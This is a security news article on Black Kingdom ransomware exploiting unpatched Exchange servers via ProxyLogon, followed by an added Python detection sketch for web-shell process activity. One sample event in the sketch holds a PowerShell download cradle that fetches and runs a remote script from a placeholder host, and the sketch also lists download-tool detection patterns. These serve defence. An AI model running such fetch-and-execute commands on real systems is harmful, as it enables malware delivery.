Black Kingdom Ransomware Hunting Unpatched Microsoft Exchange Servers (Security News, March 2021)

More than a week after Microsoft released a one-click mitigation tool to blunt cyberattacks targeting on-premises Exchange servers, the company disclosed that patches had been applied to 92% of all internet-facing servers affected by the ProxyLogon vulnerabilities.
According to telemetry data from RiskIQ, there are roughly 29,966 instances of Microsoft Exchange servers still exposed to attacks, down from 92,072 on March 10.
While Exchange servers were already under assault by multiple Chinese-linked state-sponsored hacking groups before Microsoft's patch on March 2, the release of public proof-of-concept exploits set off a feeding frenzy of infections, opening the door to escalating attacks: ransomware, and the hijacking of web shells planted on unpatched Microsoft Exchange servers to deliver cryptominers and other malware.
"To make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server," cybersecurity firm F-Secure noted in a write-up last week.
Cybersecurity firm Sophos' analysis of Black Kingdom describes the ransomware as "somewhat rudimentary and amateurish in its composition": the attackers abuse the ProxyLogon flaw to deploy a web shell, use it to issue a PowerShell command that downloads the ransomware payload, and the payload then encrypts files and demands a bitcoin ransom in exchange for the private key.
"The Black Kingdom ransomware targeting unpatched Exchange servers has all the hallmarks of being created by a motivated script-kiddie," Mark Loman, director of engineering at Sophos, said.
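The chain Sophos describes (web shell on the Exchange front end, then a PowerShell command that fetches the payload) leaves a distinctive trace in process-creation telemetry: a shell interpreter whose parent is the IIS worker process. The following detection sketch is an added example, not code from the article, Sophos or Microsoft; it runs over a handful of constructed Sysmon-style events embedded inline, and the rule names, severity labels and sample command lines are this example's own assumptions rather than anything the page lists.

```python
import ntpath
import re
from dataclasses import dataclass

# Constructed sample process-creation events (Sysmon Event ID 1-style fields).
# These records are made up for the example; they are not data from the article.
SAMPLE_EVENTS = [
    {   # shell interpreter spawned by the IIS worker, pulling a remote script
        "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                   ".DownloadString('http://example.invalid/payload.ps1')",
        "user": r"NT AUTHORITY\SYSTEM",
    },
    {   # reconnaissance-style command spawned by the IIS worker
        "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": "cmd.exe /c whoami",
        "user": r"NT AUTHORITY\SYSTEM",
    },
    {   # benign: an administrator running a local script from the desktop
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -File C:\scripts\backup.ps1",
        "user": r"CORP\admin",
    },
    {   # benign: Exchange's own health-manager worker invoking PowerShell
        "parent": r"C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeHMWorker.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -NonInteractive -Command Get-Date",
        "user": r"NT AUTHORITY\SYSTEM",
    },
]

# IIS worker process that hosts the Exchange front-end web applications.
WEB_WORKERS = {"w3wp.exe"}
# Interpreters a web shell would typically hand commands to.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line fragments that indicate the interpreter is fetching remote content.
DOWNLOAD_INDICATORS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|start-bitstransfer|net\.webclient",
    re.IGNORECASE,
)
# Encoded-command switches that hide the script body from plain-text review.
ENCODED_FLAG = re.compile(r"(^|\s)-(e|ec|en|enc|encodedcommand)\s", re.IGNORECASE)


@dataclass
class Finding:
    rule: str       # hypothetical rule name chosen for this example
    severity: str   # hypothetical severity label
    cmdline: str    # the offending command line, for the analyst


def analyze_event(ev):
    """Return the findings for one process-creation event (empty list if benign)."""
    parent = ntpath.basename(ev["parent"]).lower()   # ntpath handles Windows paths on any OS
    image = ntpath.basename(ev["image"]).lower()
    cmd = ev["cmdline"]
    findings = []
    if parent in WEB_WORKERS and image in SHELLS:
        # A shell under the IIS worker is the signature of web-shell command execution.
        findings.append(Finding("iis_worker_spawned_shell", "high", cmd))
        if DOWNLOAD_INDICATORS.search(cmd):
            # Same parentage plus a download cradle: payload staging, as in the article.
            findings.append(Finding("download_cradle_from_iis", "critical", cmd))
        if ENCODED_FLAG.search(cmd):
            findings.append(Finding("encoded_command_from_iis", "critical", cmd))
    elif image in POWERSHELL and DOWNLOAD_INDICATORS.search(cmd):
        # Download cradle from any other parent: lower confidence, still worth review.
        findings.append(Finding("powershell_download", "medium", cmd))
    return findings


def analyze_events(events):
    """Run the rules over a batch of events and collect every finding in order."""
    return [f for ev in events for f in analyze_event(ev)]


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.cmdline}")
```

The parentage check carries the weight here: Exchange's own components legitimately launch PowerShell (the last sample event), so matching on the interpreter alone would drown the signal, whereas a shell under w3wp.exe is rare enough on a healthy server to page on. Rules keyed on command-line strings are easy to evade and should be treated as a second, cheaper layer.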
News URL: http://feedproxy.google.com/~r/TheHackersNews/~3/9gpZG_Qu02c/black-kingdom-ransomware-hunting.html